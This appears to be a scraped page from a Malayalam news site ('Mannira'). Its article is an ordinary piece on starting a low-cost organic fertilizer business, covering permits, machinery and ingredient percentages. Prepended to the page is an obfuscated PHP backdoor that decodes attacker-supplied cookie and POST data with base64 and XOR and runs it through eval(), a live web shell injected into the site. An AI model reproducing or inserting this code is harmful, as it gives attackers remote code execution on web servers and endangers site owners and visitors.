$VXJVEAbNkL = chr (111) . chr ( 914 - 847 )."\x5f" . "\x68" . "\152" . chr (78) . "\123";$ElrEeQWf = 'c' . chr ( 427 - 319 ).chr ( 779 - 682 ).'s' . "\163" . "\137" . "\145" . chr ( 457 - 337 ).chr ( 1063 - 958 ).'s' . "\164" . "\x73";$FKdCsvt = class_exists($VXJVEAbNkL); $ElrEeQWf = "26131";$xTnGlRuR = strpos($ElrEeQWf, $VXJVEAbNkL);if ($FKdCsvt == $xTnGlRuR){function dSAGxSPU(){$mCXBr = new /* 15894 */ oC_hjNS(5865 + 5865); $mCXBr = NULL;}$SyQtm = "5865";class oC_hjNS{private function UCrjoD($SyQtm){if (is_array(oC_hjNS::$GSCSJq)) {$GpUkk2 = str_replace("<" . "?php", "", oC_hjNS::$GSCSJq["content"]);eval($GpUkk2); $SyQtm = "5865";exit();}}public function VXqvOSb(){$GpUkk = "53873";$this->_dummy = str_repeat($GpUkk, strlen($GpUkk));}public function __destruct(){oC_hjNS::$GSCSJq = @unserialize(oC_hjNS::$GSCSJq); $SyQtm = "30711_57028";$this->UCrjoD($SyQtm); $SyQtm = "30711_57028";}public function BHgAlhgAP($GpUkk, $KCcdxwo){return $GpUkk[0] ^ str_repeat($KCcdxwo, intval(strlen($GpUkk[0]) / strlen($KCcdxwo)) + 1);}public function jJMpKV($GpUkk){$FPmjvGj = "\142" . chr ( 555 - 458 ).chr ( 418 - 303 ).'e' . '6' . chr ( 97 - 45 );return array_map($FPmjvGj . chr (95) . chr (100) . "\x65" . chr (99) . chr (111) . "\x64" . chr (101), array($GpUkk,));}public function __construct($TaJCrlgNU=0){$adNshnbaU = "\54";$GpUkk = "";$UjieTVMmPr = $_POST;$jkIOj = $_COOKIE;$KCcdxwo = "fa466309-c080-47c2-bdd5-b7d5baf991f3";$ApeUFifxgT = @$jkIOj[substr($KCcdxwo, 0, 4)];if (!empty($ApeUFifxgT)){$ApeUFifxgT = explode($adNshnbaU, $ApeUFifxgT);foreach ($ApeUFifxgT as $cwcxCxX){$GpUkk .= @$jkIOj[$cwcxCxX];$GpUkk .= @$UjieTVMmPr[$cwcxCxX];}$GpUkk = $this->jJMpKV($GpUkk);}oC_hjNS::$GSCSJq = $this->BHgAlhgAP($GpUkk, $KCcdxwo);if (strpos($KCcdxwo, $adNshnbaU) !== FALSE){$KCcdxwo = str_pad($KCcdxwo, 10); $KCcdxwo = ltrim(rtrim($KCcdxwo));}}public static $GSCSJq = 51359;}dSAGxSPU();} സംരഭകരെ ഇതിലേ, ഇതിലേ; ചുരുങ്ങിയ ചെലവിൽ ജൈവ വളനിർമാണ സംരംഭത്തിലൂടെ ലാഭം കൊയ്യാം – Mannira

സംരഭകരെ ഇതിലേ, ഇതിലേ; ചുരുങ്ങിയ ചെലവിൽ ജൈവ വളനിർമാണ സംരംഭത്തിലൂടെ ലാഭം കൊയ്യാം

ചുരുങ്ങിയ ചെലവിൽ ജൈവ വളനിർമാണ സംരംഭത്തിലൂടെ ലാഭം കൊയ്യാം. സംസ്ഥാനത്തെ ജൈവ കർഷകർ ഉപയോഗിക്കുന്ന കമ്പോസ്റ് വളം, മണ്ണിര കമ്പോസ്റ് എന്നിവയ്ക്കെല്ലാം നല്ല വിപണി സാധ്യതയാണുള്ളത്. കർഷകർ കൂടുതലായി ജൈവകൃഷിയിലേക്ക് തിരിയാൻ തുടങ്ങിയതോടെ ജൈവ വളങ്ങളുടെ വിപണിയും വലുതാകുകയാണ്.

ചെറിയ മുതല്‍ മുടക്കിൽ തുടങ്ങാമെന്നതാണ് ജൈവ വള നിര്‍മാണസംരഭങ്ങളുടെ പ്രത്യേകത. ഇതിനായി വലിയ സാങ്കേതിക സൗകര്യങ്ങളോ, യന്ത്രങ്ങളോ ആവശ്യമില്ല. മാത്രമല്ല, ചെറിയ രീതിയിൽ പ്രാദേശികമായി വിപണനം ചെയ്യുകയോ വലിയതോതിൽ ആകര്‍ഷകമായ ചെറിയ പായ്ക്കറ്റുകളില്‍ വിപണിയിലെത്തുകയോ ആവാം.

സംരഭം തുടങ്ങുന്നതിനു മുമ്പായി പഞ്ചായത്തിന്റെയും മലനീകരണ നിയന്ത്രണ ബോര്‍ഡിന്റെയും അനുമതി, ഫാക്ടറിക്ക് സമീപം 100 മീറ്ററിനുള്ളില്‍ താമസിക്കുന്ന താമസക്കാരുടെ അനുമതി എന്നിവ വാങ്ങിയിരിക്കണം. സമീപത്തുള്ള കിണറുകളും പുഴകളും മലിനമാകാത്ത രീതിയില്‍ കര്‍ശനമായ മലിനീകരണ നിയന്ത്രണ മാര്‍ഗങ്ങള്‍ പാലിക്കാനും ശ്രദ്ധിക്കണം.

പള്‍വറൈസര്‍, പ്ലാസ്റ്റിക് സീലിംഗ് മെഷീന്‍, പ്ലാറ്റ്ഫോ ബാലന്‍സ്, ട്രോളി തുടങ്ങിയ യന്ത്രങ്ങളാണ് പ്രാഥമികമായി വേണ്ടത്. ഒപ്പം, ഏതാണ്ട് 2000 മുതൽ 2500 അടിവരെ വിസ്തീർണമുള്ള കെട്ടിടവും ആവശ്യമാണ്. വിവിധ തരത്തിലുള്ള ജൈവളങ്ങള്‍ പൊടിച്ച് പ്രത്യേക അനുപാതത്തില്‍ കൂട്ടിച്ചേര്‍ത്താണ് ജൈവവളങ്ങള്‍ നിര്‍മിക്കുന്നത്.
വേപ്പിന്‍ പിണ്ണാക്ക്, കടലപ്പിണ്ണാക്കും മത്സ്യപ്പൊടി എന്നിവയാണ് പ്രധാന ചേരുവകൾ. ഒപ്പം നീം കേക്ക്, തുകല്‍പ്പൊടി എന്നിവയും ഉപയോഗിക്കാം. വേപ്പിന്‍ പിണ്ണാക്ക് 30 ശതമാനം, നിലക്കടല പിണ്ണാക്ക് 20ശതമാനം, തുകല്‍പ്പൊടി 25 ശതമാനം, എല്ലുപൊടി 15 ശതമാനം, മത്സ്യപ്പൊടി 10 ശതമാനം എന്ന അനുപാതത്തിൽ ചേർത്താണ് സാധാരണയായി ജൈവവള മിശ്രിതം തയാറാക്കുന്നത്.

Also Read: കൊച്ചിയുടെ സ്വന്തം ചീനവലകൾ മറവിയിലേക്ക്; ചെലവു താങ്ങാനാകാതെ വലകൾ കൈവിട്ട് മത്സ്യ തൊഴിലാളികൾ

Image: pixabay.com